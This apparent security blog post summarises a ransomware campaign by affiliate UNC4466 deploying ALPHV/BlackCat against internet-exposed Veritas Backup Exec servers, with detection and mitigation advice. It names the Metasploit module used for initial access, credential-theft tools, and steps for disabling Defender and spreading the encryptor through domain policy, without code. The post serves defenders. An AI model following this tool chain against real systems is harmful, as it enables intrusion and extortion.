The threat of ransomware has been a growing concern for organizations of all sizes and sectors, and it seems to be getting worse. The latest ransomware campaign targeting Veritas Backup Exec installations has caught the attention of cybersecurity experts. ALPHV (also known as BlackCat) ransomware is being used by a new ransomware affiliate, UNC4466, to target publicly exposed Veritas Backup Exec installations. Mandiant has observed that this affiliate is exploiting known vulnerabilities to gain initial access. In this blog post, we will cover the attack lifecycle of UNC4466, its tactics, techniques, and procedures, and provide recommendations for detection and prevention.
Timeline of Veritas Backup Exec Vulnerabilities and Exploits
In March 2021, Veritas published an advisory reporting three critical vulnerabilities in Veritas Backup Exec 16.x, 20.x and 21.x. On September 23, 2022, a METASPLOIT module was released which exploits these vulnerabilities and creates a session that threat actors can use to interact with the victim system. On October 22, 2022, Mandiant first observed exploitation of the Veritas vulnerabilities in the wild.
Attack Phases: Initial Compromise to Complete Mission
UNC4466 gained access to an internet-exposed Windows server, running Veritas Backup Exec version 21.0 using the Metasploit module exploit/multi/veritas/beagent_sha_auth_rce. The threat actor used ADRecon to gather network, account, and host information in the victim’s environment. UNC4466 made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor.
After gaining access to the Veritas Backup Exec server, UNC4466 used Internet Explorer to download Famatech’s Advanced IP Scanner from its website, which is capable of scanning individual IP addresses or IP address ranges for open ports and returns hostname, operating system, and hardware manufacturer information. UNC4466 also made use of ADRecon to gather network, account, and host information in the victim’s environment.
UNC4466 leveraged SOCKS5 tunneling to communicate with compromised systems in the victim network. The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne, and Nanodump, to gather clear-text credentials and credential material. UNC4466 took steps to evade detection, including disabling Microsoft Defender’s real-time monitoring capability and clearing event logs.
UNC4466 deploys the Rust-based ALPHV ransomware by adding immediate tasks to the default domain policy. These tasks are configured to perform actions that disable security software, download the ALPHV encryptor, and execute it.
Detection Opportunities and Indicators of Compromise
Defenders should monitor internet-exposed Veritas Backup Exec Windows installations, particularly those before version 21.2. Veritas Backup Exec logs record evidence of connections to remote systems and suspicious pre and post backup job commands. Additionally, these logs can also record the execution of suspicious pre and post backup job commands. Furthermore, log files should be forwarded to a SIEM or similar technology that enables detection and alerting when certain events are recorded.
Full IoCs are provided in the Mandiant article.
Mitigation Recommendations
Organizations should inventory externally facing services and reduce the attack surface available to attackers. Implementing secure access controls, segmenting networks, enabling multi-factor authentication, and regularly testing and evaluating backup strategies to limit the impact of a ransomware attack is critical. In addition, it is recommended to conduct frequent vulnerability scans and penetration testing of externally facing systems to identify and remediate vulnerabilities proactively.
Conclusion
ALPHV ransomware (also known as BlackCat ransomware) has been observed targeting vulnerable installations of Veritas Backup Exec that are publicly exposed to the internet. The threat actor behind the ransomware has been tracked as UNC4466 and primarily gains access through known vulnerabilities. The attack lifecycle, indicators, and detection opportunities have been covered in this blog post. Defenders should prioritize monitoring internet-exposed Veritas Backup Exec installations for versions before 21.2 and monitor the Backup Exec log files for any suspicious activity.
